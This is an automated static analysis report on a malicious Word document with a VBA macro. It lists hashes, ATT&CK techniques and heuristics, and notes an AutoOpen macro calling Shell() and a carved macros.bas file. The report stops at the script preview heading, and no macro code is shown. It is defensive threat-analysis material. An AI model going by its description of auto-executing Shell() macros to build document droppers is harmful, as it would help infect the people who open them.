Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7508b253958fdaa3…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 79.5 KB
Created: 2017-11-01 05:24:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: ea4bb39dddc96656cb19d92983f0a0ba
SHA-1: bd790a645751badfee526ad37df31c895fb96d60
SHA-256: 7508b253958fdaa3d21f6703ac3fa4566cefa4c76cbc4815f15b44cd63abe005
Risk score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The macro calls the Shell() function, which fires a critical heuristic indicating an attempt to execute arbitrary commands. This is further supported by the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic, which flags an AutoOpen macro that executes Shell. The primary IOC is the extracted VBA macro file itself, which likely contains the malicious logic.

Heuristics (8)

  • CLAMAV_DETECTION (critical): ClamAV: Doc.Dropper.Agent-6362395-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6362395-0
  • OLE_VBA_MACROS (medium, 3 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    Shell() call in VBA
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
    AutoOpen macro
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EXTRACTED_FILE_STATIC_TRIAGE (info): Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 35922 bytes
SHA-256: 4b133c6a4ce19ca5ceda44ac37087f6c78f5e4a282e640438341e42f7edde159
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 62 long base64-like blobs)
Preview script
First 1,000 lines of the extracted script